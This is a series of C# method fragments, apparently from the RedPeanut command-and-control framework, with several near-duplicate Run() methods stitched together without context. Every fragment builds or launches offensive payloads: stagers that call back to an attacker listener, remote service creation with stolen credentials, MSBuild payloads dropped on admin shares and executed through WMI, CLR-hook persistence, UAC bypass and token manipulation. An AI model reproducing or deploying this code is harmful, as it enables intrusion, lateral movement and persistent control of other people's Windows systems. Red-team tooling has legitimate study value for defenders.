private void Run()
{
List <string> args = new List <string>();
if (username == null || password == null || domain == null || targethost == null || lhost == null || profile == 0 || (lport == 0 && lpipename == null))
{
return;
}
else
{
//Create stager stream gzip
string folderrpath = Path.Combine(Directory.GetCurrentDirectory(), WORKSPACE_FOLDER, TEMPLATE_FOLDER);
if (Program.GetC2Manager().GetC2Server().GetProfiles().ContainsKey(profile))
{
string source = File.ReadAllText(Path.Combine(folderrpath, STAGER_TEMPLATE));
if (lpipename == null)
{
//Http no pivot stager
ListenerConfig conf = new ListenerConfig("", lhost, lport, Program.GetC2Manager().GetC2Server().GetProfile(profile), profile);
source = Replacer.ReplaceAgentProfile(source, RedPeanut.Program.GetServerKey(), 40, conf);
}
else
{
//NamedPipe enable stager
ListenerPivotConfig conf = new ListenerPivotConfig("", lhost, lpipename, Program.GetC2Manager().GetC2Server().GetProfile(profile));
source = Replacer.ReplaceAgentProfile(source, RedPeanut.Program.GetServerKey(), 40, conf);
}
string stagerstr = Convert.ToBase64String(CompressGZipAssembly(Builder.BuidStreamAssembly(source, RandomAString(10, new Random()) + ".dll", 40)));
//Create TaskMsg gzip
if (agent != null)
{
//Create Service stream gzip
source = File.ReadAllText(Path.Combine(folderrpath, SERVICE_TEMPLATE))
.Replace("#NUTCLR#", Convert.ToBase64String(CompressGZipAssembly(Builder.GenerateShellcode(stagerstr, RandomString(10, new Random()) + ".exe", "RedPeanutRP", "Main", new string[] { "" }))))
.Replace("#SPAWN#", Program.GetC2Manager().GetC2Server().GetProfile(profile).Spawn);
string servicestr = Convert.ToBase64String(CompressGZipAssembly(Builder.BuidStreamAssembly(source, RandomAString(10, new Random()), 40, "exe")));
//Create SharpPsExec stream gzip
source = File.ReadAllText(Path.Combine(folderrpath, SHARPSEXEC_TEMPLATE))
.Replace("#DOMAIN#", domain)
.Replace("#USERNAME#", username)
.Replace("#PASSWORD#", password)
.Replace("#HOSTANME#", targethost)
.Replace("#ASSEMBLY#", servicestr)
.Replace("#EXENAME#", (!string.IsNullOrEmpty(exename)) ? exename : RandomAString(10, new Random()) + ".exe")
.Replace("#SERVICEDISPLAYNAME#", (!string.IsNullOrEmpty(servdispname)) ? servdispname : RandomAString(10, new Random()))
.Replace("#SERVICEDESCRIPTION#", (!string.IsNullOrEmpty(servdescr)) ? servdescr : RandomAString(10, new Random()))
.Replace("#SERVICENAME#", (!string.IsNullOrEmpty(servname)) ? servname : RandomAString(10, new Random()));
string sharppsexecstr = Convert.ToBase64String(CompressGZipAssembly(Builder.BuidStreamAssembly(source, RandomAString(10, new Random()) + ".dll", 40)));
RunAssemblyBase64(sharppsexecstr, "SharpPsExec.Program", new string[] { "pippo" }, agent);
}
}
}
}
private void Run()
{
List <string> args = new List <string>();
try
{
if (string.IsNullOrEmpty(filename) || string.IsNullOrEmpty(pipename) || profile > 0)
{
return;
}
else
{
// Parse .cs sorce and repalce variable
string folderrpath = Path.Combine(Directory.GetCurrentDirectory(), WORKSPACE_FOLDER, TEMPLATE_FOLDER);
if (Program.GetC2Manager().GetC2Server().GetProfiles().ContainsKey(profile))
{
ListenerPivotConfig conf = new ListenerPivotConfig("", lhost, pipename, Program.GetC2Manager().GetC2Server().GetProfile(profile));
string source = File.ReadAllText(Path.Combine(folderrpath, STAGER_TEMPLATE));
source = Replacer.ReplaceAgentProfile(source, RedPeanut.Program.GetServerKey(), 40, conf);
Builder.GenerateExe(source, "pivot_" + filename);
}
}
}catch (Exception e)
{
Console.WriteLine("[*] Error running task build {0}", e.Message);
return;
}
}
private void Run()
{
try
{
string host = ((AgentInstanceHttp)agent).GetAddress();
int port = ((AgentInstanceHttp)agent).GetPort();
int profileid = ((AgentInstanceHttp)agent).GetProfileid();
int targetframework = ((AgentInstanceHttp)agent).TargetFramework;
string pipename = "";
if (agent.Pivoter != null)
{
host = agent.Pivoter.SysInfo.Ip;
port = 0;
profileid = RedPeanutC2.server.GetDefaultProfile();
targetframework = agent.TargetFramework;
pipename = agent.AgentId;
}
else
{
host = ((AgentInstanceHttp)agent).GetAddress();
port = ((AgentInstanceHttp)agent).GetPort();
profileid = ((AgentInstanceHttp)agent).GetProfileid();
targetframework = agent.TargetFramework;
}
string folderrpath = Path.Combine(Directory.GetCurrentDirectory(), WORKSPACE_FOLDER, TEMPLATE_FOLDER);
if (Program.GetC2Manager().GetC2Server().GetProfiles().ContainsKey(profileid))
{
string source;
if (string.IsNullOrEmpty(pipename))
{
//Http no pivot stager
ListenerConfig conf = new ListenerConfig("", host, port, Program.GetC2Manager().GetC2Server().GetProfile(profileid), profileid);
source = File.ReadAllText(Path.Combine(folderrpath, STAGER_TEMPLATE));
source = Replacer.ReplaceAgentProfile(source, RedPeanut.Program.GetServerKey(), targetframework, conf);
}
else
{
//NamedPipe enable stager
ListenerPivotConfig conf = new ListenerPivotConfig("", host, pipename, Program.GetC2Manager().GetC2Server().GetProfile(profileid));
source = File.ReadAllText(Path.Combine(folderrpath, STAGER_TEMPLATE));
source = Replacer.ReplaceAgentProfile(source, RedPeanut.Program.GetServerKey(), targetframework, conf);
}
string stagerstr = Convert.ToBase64String(CompressGZipAssembly(Builder.BuidStreamAssembly(source, RandomAString(10, new Random()) + ".dll", targetframework)));
ModuleConfig modconfig = new ModuleConfig
{
Assembly = stagerstr,
Method = "Execute",
Moduleclass = "RedPeanutRP",
Parameters = new string[] { "pippo" }
};
TaskMsg task = new TaskMsg
{
TaskType = "module",
ModuleTask = modconfig,
Agentid = agent.AgentId
};
if (agent.Pivoter != null)
{
task.AgentPivot = agent.Pivoter.AgentId;
}
source = File.ReadAllText(Path.Combine(folderrpath, SPAWN_TEMPLATE))
.Replace("#NUTCLR#", ReadResourceFile(PL_COMMAND_NUTCLRWNF))
.Replace("#TASK#", Convert.ToBase64String(CompressGZipAssembly(Encoding.Default.GetBytes(JsonConvert.SerializeObject(task)))))
.Replace("#SPAWN#", Program.GetC2Manager().GetC2Server().GetProfile(profileid).Spawn)
.Replace("#SHELLCODE#", null)
.Replace("#USERNAME#", username)
.Replace("#PASSWORD#", password)
.Replace("#DOMAIN#", domain)
.Replace("#PROCESS#", null);
string spawnprocess = Convert.ToBase64String(CompressGZipAssembly(Builder.BuidStreamAssembly(source, RandomAString(10, new Random()) + ".dll", targetframework, compprofile: CompilationProfile.UACBypass)));
RunAssemblyBase64(
spawnprocess,
"RedPeanutSpawn",
new string[] { " " },
agent);
}
}
catch (Exception)
{
Console.WriteLine("[*] Errore generating task");
}
}
private void Run()
{
List <string> args = new List <string>();
if (username == null || password == null || domain == null || targethost == null || lhost == null || profile == 0 || (lport == 0 && lpipename == null))
{
return;
}
else
{
//Create stager stream gzip
string folderrpath = Path.Combine(Directory.GetCurrentDirectory(), WORKSPACE_FOLDER, TEMPLATE_FOLDER);
if (Program.GetC2Manager().GetC2Server().GetProfiles().ContainsKey(profile))
{
string source = File.ReadAllText(Path.Combine(folderrpath, STAGER_TEMPLATE));
if (lpipename == null)
{
//Http no pivot stager
ListenerConfig conf = new ListenerConfig("", lhost, lport, Program.GetC2Manager().GetC2Server().GetProfile(profile), profile);
source = Replacer.ReplaceAgentProfile(source, RedPeanut.Program.GetServerKey(), 40, conf);
}
else
{
//NamedPipe enable stager
ListenerPivotConfig conf = new ListenerPivotConfig("", lhost, lpipename, Program.GetC2Manager().GetC2Server().GetProfile(profile));
source = Replacer.ReplaceAgentProfile(source, RedPeanut.Program.GetServerKey(), 40, conf);
}
string stagerstr = Convert.ToBase64String(CompressGZipAssembly(Builder.BuidStreamAssembly(source, RandomAString(10, new Random()), 40)));
//Create TaskMsg gzip
if (agent != null)
{
ModuleConfig modconfig = new ModuleConfig
{
Assembly = stagerstr,
Method = "Execute",
Moduleclass = "RedPeanutRP",
Parameters = new string[] { "pippo" }
};
TaskMsg task = new TaskMsg
{
TaskType = "module",
ModuleTask = modconfig,
Agentid = agent.AgentId
};
if (agent.Pivoter != null)
{
task.AgentPivot = agent.Pivoter.AgentId;
}
//Create Service stream gzip
source = File.ReadAllText(Path.Combine(folderrpath, SERVICE_TEMPLATE))
.Replace("#NUTCLR#", ReadResourceFile(PL_COMMAND_NUTCLR))
.Replace("#TASK#", Convert.ToBase64String(CompressGZipAssembly(Encoding.Default.GetBytes(JsonConvert.SerializeObject(task)))))
.Replace("#SPAWN#", Program.GetC2Manager().GetC2Server().GetProfile(profile).Spawn);
string servicestr = Convert.ToBase64String(CompressGZipAssembly(Builder.BuidStreamAssembly(source, RandomAString(10, new Random()), 40, "exe")));
//Create SharpPsExec stream gzip
source = File.ReadAllText(Path.Combine(folderrpath, SHARPSEXEC_TEMPLATE))
.Replace("#DOMAIN#", domain)
.Replace("#USERNAME#", username)
.Replace("#PASSWORD#", password)
.Replace("#HOSTANME#", targethost)
.Replace("#ASSEMBLY#", servicestr)
.Replace("#EXENAME#", (!string.IsNullOrEmpty(exename)) ? exename : RandomAString(10, new Random()) + ".exe")
.Replace("#SERVICEDISPLAYNAME#", (!string.IsNullOrEmpty(servdispname)) ? servdispname : RandomAString(10, new Random()))
.Replace("#SERVICEDESCRIPTION#", (!string.IsNullOrEmpty(servdescr)) ? servdescr : RandomAString(10, new Random()))
.Replace("#SERVICENAME#", (!string.IsNullOrEmpty(servname)) ? servname : RandomAString(10, new Random()));
string sharppsexecstr = Convert.ToBase64String(CompressGZipAssembly(Builder.BuidStreamAssembly(source, RandomAString(10, new Random()) + ".dll", 40)));
RunAssemblyBase64(sharppsexecstr, "SharpPsExec.Program", new string[] { "pippo" }, agent);
}
}
}
}
private void Run()
{
try
{
string host = ((AgentInstanceHttp)agent).GetAddress();
int port = ((AgentInstanceHttp)agent).GetPort();
int profileid = ((AgentInstanceHttp)agent).GetProfileid();
int targetframework = ((AgentInstanceHttp)agent).TargetFramework;
string pipename = "";
if (!string.IsNullOrEmpty(process))
{
if (agent.Pivoter != null)
{
host = agent.Pivoter.SysInfo.Ip;
port = 0;
profileid = RedPeanutC2.server.GetDefaultProfile();
targetframework = agent.TargetFramework;
pipename = agent.AgentId;
}
else
{
host = ((AgentInstanceHttp)agent).GetAddress();
port = ((AgentInstanceHttp)agent).GetPort();
profileid = ((AgentInstanceHttp)agent).GetProfileid();
targetframework = agent.TargetFramework;
}
string folderrpath = Path.Combine(Directory.GetCurrentDirectory(), WORKSPACE_FOLDER, TEMPLATE_FOLDER);
if (Program.GetC2Manager().GetC2Server().GetProfiles().ContainsKey(profileid))
{
string source;
if (string.IsNullOrEmpty(pipename))
{
//Http no pivot stager
ListenerConfig conf = new ListenerConfig("", host, port, Program.GetC2Manager().GetC2Server().GetProfile(profileid), profileid);
source = File.ReadAllText(Path.Combine(folderrpath, STAGER_TEMPLATE));
source = Replacer.ReplaceAgentProfile(source, RedPeanut.Program.GetServerKey(), targetframework, conf);
}
else
{
//NamedPipe enable stager
ListenerPivotConfig conf = new ListenerPivotConfig("", host, pipename, Program.GetC2Manager().GetC2Server().GetProfile(profileid));
source = File.ReadAllText(Path.Combine(folderrpath, STAGER_TEMPLATE));
source = Replacer.ReplaceAgentProfile(source, RedPeanut.Program.GetServerKey(), targetframework, conf);
}
string stagerstr = Convert.ToBase64String(CompressGZipAssembly(Builder.BuidStreamAssembly(source, RandomAString(10, new Random()) + ".dll", targetframework)));
string hookfilename = RandomAString(10, new Random()) + ".dll";
//string clrhook = Convert.ToBase64String(CompressGZipAssembly(Builder.BuidStreamAssembly(source, hookfilename, targetframework, compprofile: CompilationProfile.PersistenceCLR)));
string keyfilename = Path.Combine(Directory.GetCurrentDirectory(), WORKSPACE_FOLDER, KEYFILE_FOLDER, "key.snk");
if (clrversion != 35 && clrversion != 40)
{
clrversion = 40;
}
source = File.ReadAllText(Path.Combine(folderrpath, CLRHOOKINSTALL_TEMPLATE))
.Replace("#KEYFILE#", Convert.ToBase64String(CompressGZipAssembly(File.ReadAllBytes(keyfilename))))
.Replace("#STAGER#", stagerstr)
.Replace("#FILENAME#", hookfilename)
.Replace("#PROCESS#", process)
.Replace("#CLRVERSION#", clrversion.ToString());
string clrhookinstaller = Convert.ToBase64String(CompressGZipAssembly(Builder.BuidStreamAssembly(source, RandomAString(10, new Random()) + ".dll", targetframework, compprofile: CompilationProfile.UACBypass)));
if (uninstall)
{
RunAssemblyBase64(clrhookinstaller, "PersCLRInstall", new string[] { "cleanenv" }, agent);
}
else
{
RunAssemblyBase64(clrhookinstaller, "PersCLRInstall", new string[] { "install" }, agent);
}
}
}
}
catch (Exception)
{
Console.WriteLine("[*] Errore generating task");
}
}
private void Run()
{
try
{
if (string.IsNullOrEmpty(username) || string.IsNullOrEmpty(password) || string.IsNullOrEmpty(lhost) || (string.IsNullOrEmpty(lpipename) && lport < 1) || profile < 1)
{
return;
}
else
{
// Parse .cs sorce and repalce variable
string folderrpath = Path.Combine(Directory.GetCurrentDirectory(), WORKSPACE_FOLDER, TEMPLATE_FOLDER);
if (Program.GetC2Manager().GetC2Server().GetProfiles().ContainsKey(profile))
{
string domainname = ".";
if (!string.IsNullOrEmpty(domain))
{
domainname = domain;
}
string source = File.ReadAllText(Path.Combine(folderrpath, STAGER_TEMPLATE));
if (lpipename == null)
{
//Http no pivot stager
ListenerConfig conf = new ListenerConfig("", lhost, lport, Program.GetC2Manager().GetC2Server().GetProfile(profile), profile);
source = Replacer.ReplaceAgentProfile(source, RedPeanut.Program.GetServerKey(), 40, conf);
}
else
{
//NamedPipe enable stager
ListenerPivotConfig conf = new ListenerPivotConfig("", lhost, lpipename, Program.GetC2Manager().GetC2Server().GetProfile(profile));
source = Replacer.ReplaceAgentProfile(source, RedPeanut.Program.GetServerKey(), 40, conf);
}
string stagerstr = Convert.ToBase64String(CompressGZipAssembly(Builder.BuidStreamAssembly(source, RandomAString(10, new Random()) + ".dll", 40)));
//Create TaskMsg gzip
if (agent != null)
{
source = File.ReadAllText(Path.Combine(folderrpath, SPAWNER_TEMPLATE))
.Replace("#NUTCLR#", Convert.ToBase64String(CompressGZipAssembly(Builder.GenerateShellcode(stagerstr, RandomString(10, new Random()) + ".exe", "RedPeanutRP", "Main", new string[] { "" }))))
.Replace("#SPAWN#", Program.GetC2Manager().GetC2Server().GetProfile(profile).Spawn)
.Replace("#USERNAME#", username)
.Replace("#PASSWORD#", password)
.Replace("#DOMAIN#", domain);
string spawner = Convert.ToBase64String(CompressGZipAssembly(Builder.BuidStreamAssembly(source, RandomAString(10, new Random()) + ".dll", 40)));
Dictionary <string, string> msbuildargs = new Dictionary <string, string>();
msbuildargs.Add("#{taskname}", taskname);
MSBuildGenerator gen = new MSBuildGenerator(spawner, msbuildargs);
string pathdest = string.Format(@"\\{0}\C$\Windows\temp", targethost);
string filename = RandomAString(10, new Random()).ToLower() + ".xml";
string filesrc = Convert.ToBase64String(CompressGZipAssembly(Encoding.Default.GetBytes(gen.GetScriptText())));
string destinattionfull = pathdest.TrimEnd('\\') + @"\" + filename;
string destinationpath = ".";
if (!string.IsNullOrEmpty(pathdest))
{
destinationpath = pathdest.Replace("\\", "\\\\");
}
string destinationfilename = "";
if (!string.IsNullOrEmpty(filename))
{
destinationfilename = filename;
}
// Parse .cs sorce and repalce variable
source = File.ReadAllText(Path.Combine(folderrpath, FILEUPLOAD_TEMPLATE));
source = Replacer.ReplaceFileUpLoad(source, filesrc, destinationpath, destinationfilename, username, password, domainname);
string assembly = Convert.ToBase64String(CompressGZipAssembly(Builder.BuidStreamAssembly(source, "FileUpLoader.dll", 40)));
//Task agent to copy file to target host
RunAssemblyBase64(assembly, "FileUpLoader", new string[] { "pippo" }, agent);
//Run msbuld via wmi
List <string> args = new List <string>();
args.Add("action=create");
args.Add("computername=" + targethost);
args.Add("username="******"\\" + username);
args.Add("password="******"command=C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\msbuild.exe C:\\Windows\\temp\\" + destinationfilename);
string s = "";
foreach (string ss in args.ToArray())
{
s += ss;
}
Console.WriteLine("String command: " + s);
RunAssembly(PL_MODULE_SHARPWMI, "SharpWMI.Program", args.ToArray(), agent);
}
}
}
} catch (Exception e)
{
Console.WriteLine("[*] Error running task build {0}", e.Message);
}
}
public static string ReplaceAgentProfile(string src, string serverkey, int targetframework, ListenerPivotConfig config)
{
string source = src
.Replace("#HOST#", config.GetHost())
.Replace("#PORT#", "0")
.Replace("#PARAM#", "")
.Replace("#SERVERKEY#", RedPeanut.Program.GetServerKey())
.Replace("#PAGEGET#", "")
.Replace("#PAGEPOST#", "")
.Replace("#USERAGENT#", "")
.Replace("#PIPENAME#", config.GetPipename())
.Replace("#COVERED#", "false")
.Replace("#TARGETCLASS#", "")
.Replace("#SPAWN#", config.GetProfile().Spawn)
.Replace("#FRAMEWORK#", targetframework.ToString())
.Replace("#MANAGED#", config.GetProfile().InjectionManaged.ToString());
source = source
.Replace("#HEADERS#", "");
return(source);
}
private void Run()
{
try
{
string host = ((AgentInstanceHttp)agent).GetAddress();
int port = ((AgentInstanceHttp)agent).GetPort();
int profileid = ((AgentInstanceHttp)agent).GetProfileid();
int targetframework = ((AgentInstanceHttp)agent).TargetFramework;
string pipename = "";
if (agent.Pivoter != null)
{
host = agent.Pivoter.SysInfo.Ip;
port = 0;
profileid = RedPeanutC2.server.GetDefaultProfile();
targetframework = agent.TargetFramework;
pipename = agent.AgentId;
}
else
{
host = ((AgentInstanceHttp)agent).GetAddress();
port = ((AgentInstanceHttp)agent).GetPort();
profileid = ((AgentInstanceHttp)agent).GetProfileid();
targetframework = agent.TargetFramework;
}
string folderrpath = Path.Combine(Directory.GetCurrentDirectory(), WORKSPACE_FOLDER, TEMPLATE_FOLDER);
if (Program.GetC2Manager().GetC2Server().GetProfiles().ContainsKey(profileid))
{
string source;
if (string.IsNullOrEmpty(pipename))
{
//Http no pivot stager
ListenerConfig conf = new ListenerConfig("", host, port, Program.GetC2Manager().GetC2Server().GetProfile(profileid), profileid);
source = File.ReadAllText(Path.Combine(folderrpath, STAGER_TEMPLATE));
source = Replacer.ReplaceAgentProfile(source, RedPeanut.Program.GetServerKey(), targetframework, conf);
}
else
{
//NamedPipe enable stager
ListenerPivotConfig conf = new ListenerPivotConfig("", host, pipename, Program.GetC2Manager().GetC2Server().GetProfile(profileid));
source = File.ReadAllText(Path.Combine(folderrpath, STAGER_TEMPLATE));
source = Replacer.ReplaceAgentProfile(source, RedPeanut.Program.GetServerKey(), targetframework, conf);
}
string stagerstr = Convert.ToBase64String(CompressGZipAssembly(Builder.BuidStreamAssembly(source, RandomAString(10, new Random()) + ".dll", targetframework)));
/*ModuleConfig modconfig = new ModuleConfig
* {
* Assembly = stagerstr,
* Method = "Execute",
* Moduleclass = "RedPeanutRP",
* Parameters = new string[] { "pippo" }
* };
*
* TaskMsg task = new TaskMsg
* {
* TaskType = "module",
* ModuleTask = modconfig,
* Agentid = agent.AgentId
* };
*
* if (agent.Pivoter != null)
* task.AgentPivot = agent.Pivoter.AgentId;
*
*/
source = File.ReadAllText(Path.Combine(folderrpath, UACTOKEN_TEMPLATE))
.Replace("#NUTCLR#", Convert.ToBase64String(CompressGZipAssembly(
Builder.GenerateShellcode(stagerstr, RandomAString(10, new Random()) + ".exe", "RedPeanutRP", "Execute", new string[] { "pippo" })
))
)
.Replace("#SPAWN#", Program.GetC2Manager().GetC2Server().GetProfile(profileid).Spawn)
.Replace("#BINARY#", binary)
.Replace("#ARGUMENTS#", arguments)
.Replace("#PATH#", path);
string uacbypass = Convert.ToBase64String(CompressGZipAssembly(Builder.BuidStreamAssembly(source, RandomAString(10, new Random()) + ".dll", targetframework, compprofile: CompilationProfile.UACBypass)));
RunAssemblyBase64(
uacbypass,
"TokenManipulation",
new string[] { " " },
agent);
}
}
catch (Exception)
{
Console.WriteLine("[*] Errore generating task");
}
}